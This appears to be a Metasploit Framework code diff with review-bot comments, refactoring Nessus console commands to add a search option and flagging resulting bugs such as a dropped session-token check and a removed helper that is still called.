@@ -1174,35 +1268,39 @@ module Msf end def cmd_nessus_scan_details(*args) - if args[0] == "-h" - print_status("nessus_scan_details ") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return + valid_categories = ['info', 'hosts', 'vulnerabilities', 'history'] + search_term = nil + scan_id = nil + category = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("Usage: ") + print_status("nessus_scan_details -S searchterm") + print_status("Availble categories are info, hosts, vulnerabilities, and history") + print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + if args[0].in?(valid_categories) + category = args.shift + else + print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") + return + end + end end + if !nessus_verify_token return end - case args.length - when 2 - scan_id = args[0] - category = args[1] - if category.in?(['info', 'hosts', 'vulnerabilities', 'history']) - category = args[1] - else - print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") - return - end - else - print_status("Usage: ") - print_status("nessus_scan_details ") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return - end + details = @n.scan_details(scan_id) if category == "info" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Status", "Policy", 
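Review bot: The rewrite of `cmd_nessus_scan_details` removes the usage branch for a missing argument, so `nessus_scan_details` with no positional arguments leaves `scan_id` and `category` nil and still reaches `@n.scan_details(scan_id)`. Add a guard after the token check, `if scan_id.nil? || category.nil?` printing the usage and returning, before the details call. The `args[0].in?(valid_categories)` check also reports "Invalid category" when no category was given at all, which the guard would make unreachable only if the `else` branch first checks `args.empty?`.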
@@ -1214,6 +1312,7 @@ module Msf tbl << [ details["info"]["status"], details["info"]["policy"], details["info"]["name"], details["info"]["targets"], details["info"]["scan_start"], details["info"]["scan_end"] ] elsif category == "hosts" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", @@ -1227,6 +1326,7 @@ module Msf } elsif category == "vulnerabilities" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", @@ -1238,6 +1338,7 @@ module Msf } elsif category == "history" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "History ID", "Status", @@ -1319,27 +1420,31 @@ module Msf end def cmd_nessus_plugin_list(*args) - if args[0] == "-h" - print_status("nessus_plugin_list ") - print_status("Example:> nessus_plugin_list 10") - print_status() - print_status("Returns a list of all plugins in that family.") - print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") - return + search_term = nil + family_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_list -S searchterm") + print_status("Example:> nessus_plugin_list 10") + print_status("Returns a list of all plugins in that family.") + print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + family_id = arg + end end - if !nessus_verify_token - return - end - case args.length - when 1 - family_id = args[0] - else + + if family_id.nil? print_status("Usage: ") print_status("nessus_plugin_list ") print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin ID', 'Plugin Name' 
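Review bot: The `cmd_nessus_plugin_list` hunk removes the `if !nessus_verify_token` check and does not re-add it, so the plugin query below the hunk now runs without confirming a valid Nessus session, unlike the sibling `cmd_nessus_plugin_details` in this same change. Add `return unless nessus_verify_token` after the option loop, before the `family_id.nil?` usage check.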
@@ -1355,21 +1460,28 @@ module Msf end def cmd_nessus_family_list(*args) - if args[0] == "-h" - print_status("nessus_family_list") - print_status("Example:> nessus_family_list") - print_status() - print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_family_list") + print_status("Example:> nessus_family_list -S searchterm") + print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + list = @n.list_families tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Family ID', 'Family Name', 'Number of Plugins' ]) - list.each { |family| + list['families'].each { |family| tbl << [ family["id"], family["name"], family["count"] ] } print_line 
@@ -1377,27 +1489,35 @@ module Msf end def cmd_nessus_plugin_details(*args) - if args[0] == "-h" - print_status("nessus_plugin_details ") - print_status("Example:> nessus_plugin_details 10264") - print_status() - print_status("Returns details on a particular plugin.") - print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") - return + search_term = nil + plugin_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_details ") + print_status("Example:> nessus_plugin_details 10264 -S searchterm") + print_status("Returns details on a particular plugin.") + print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + plugin_id = arg + end end + if !nessus_verify_token return end - case args.length - when 1 - plugin_id = args[0] - else + + if plugin_id.nil? print_status("Usage: ") print_status("nessus_plugin_details ") print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Reference', 'Value' 
@@ -1423,13 +1543,19 @@ module Msf end def cmd_nessus_user_list(*args) - if args[0] == "-h" - print_status("nessus_user_list") - print_status("Example:> nessus_user_list") - print_status() - print_status("Returns a list of the users on the Nessus server and their access level.") - return + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_user_list") + print_status("Example:> nessus_user_list -S searchterm") + print_status("Returns a list of the users on the Nessus server and their access level.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -1438,6 +1564,7 @@ module Msf end list=@n.list_users tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'ID', 'Name', @@ -1493,7 +1620,6 @@ module Msf if args[0] == "-h" print_status("nessus_user_del ") print_status("Example:> nessus_user_del 10") - print_status() print_status("This command can only delete non admin users. You must be an admin to delete users.") print_status("Use nessus_user_list to list all users with their corresponding user IDs") return @@ -1574,13 +1700,19 @@ module Msf end def cmd_nessus_policy_list(*args) - if args[0] == "-h" - print_status("nessus_policy_list") - print_status("Example:> nessus_policy_list") - print_status() - print_status("Lists all policies on the server") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_policy_list") + print_status("Example:> nessus_policy_list -S searchterm") + print_status("Lists all policies on the server") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end 
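Review bot: `cmd_nessus_user_list` initialises `scan_id = nil`, a variable it never uses, while `search_term` is only assigned inside the `-S` branch; the later `'SearchTerm' => search_term` works solely because Ruby declares the local at parse time, leaving it nil when `-S` is absent. Replace `scan_id = nil` with `search_term = nil` to match the other rewritten commands and make the default explicit. The table construction continues in the following hunk.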
@@ -1607,7 +1739,6 @@ module Msf if args[0] == "-h" print_status("nessus_policy_del ") print_status("Example:> nessus_policy_del 1") - print_status() print_status("You must be an admin to delete policies.") print_status("Use nessus_policy_list to list all policies with their corresponding policy IDs") return @@ -1642,31 +1773,6 @@ module Msf print_error("Unknown problem occured by deleting the user account having user ID #{user_id}.") end end - - def valid_policy(*args) - case args.length - when 1 - pid = args[0] - else - print_error("No Policy ID supplied.") - return - end - pol = @n.list_policies - pol["policies"].each { |p| - if p["template_uuid"] == pid - return true - end - } - return false - end - - def nessus_verify_db - if !(framework.db and framework.db.active) - print_error("No database has been configured, please use db_create/db_connect first") - return false - end - true - end end def initialize(framework, opts) diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index 3e19e93fa7..d792b31f02 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -323,14 +323,12 @@ RSpec.describe Msf::Exploit::Powershell do end context 'when method is unknown' do - before do - subject.datastore['Powershell::method'] = 'blah' - end it 'should raise an exception' do except = false begin + subject.datastore['Powershell::method'] = 'blah' subject.cmd_psh_payload(payload, arch) - rescue RuntimeError + rescue Msf::OptionValidateError except = true end expect(except).to be_truthy diff --git a/spec/lib/msf/db_manager_spec.rb b/spec/lib/msf/db_manager_spec.rb index 47ee28d2ec..9263da301e 100644 --- a/spec/lib/msf/db_manager_spec.rb +++ b/spec/lib/msf/db_manager_spec.rb 
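Review bot: This hunk deletes `nessus_verify_db`, but `cmd_nessus_db_import` still calls `if !nessus_verify_db` in the context shown earlier on this page, so unless the method now lives elsewhere in the commit, the database check raises NoMethodError before any import happens. If it was moved, keep this call site working or update it; if not, restore `nessus_verify_db` alongside the remaining helpers.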
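Review bot: Moving `subject.datastore['Powershell::method'] = 'blah'` inside the `begin` block means the spec passes whether the `Msf::OptionValidateError` comes from the assignment or from `cmd_psh_payload`, so it no longer pins where validation happens. The manual `except` flag is also the long form of an RSpec matcher; `expect { subject.cmd_psh_payload(payload, arch) }.to raise_error(Msf::OptionValidateError)` with the assignment kept in `before` would assert the intended point and read more clearly.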
@@ -52,5 +52,4 @@ RSpec.describe Msf::DBManager do it { is_expected.to respond_to :error } it { is_expected.to respond_to :initialize_database_support } it { is_expected.to respond_to :service_name_map } - it { is_expected.to respond_to :warn_about_rubies } end diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index b4bb2d3b1c..eb294cd2f0 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -511,7 +511,7 @@ class Msftidy def check_bad_class_name if @source =~ /^\s*class (Metasploit\d+)\s*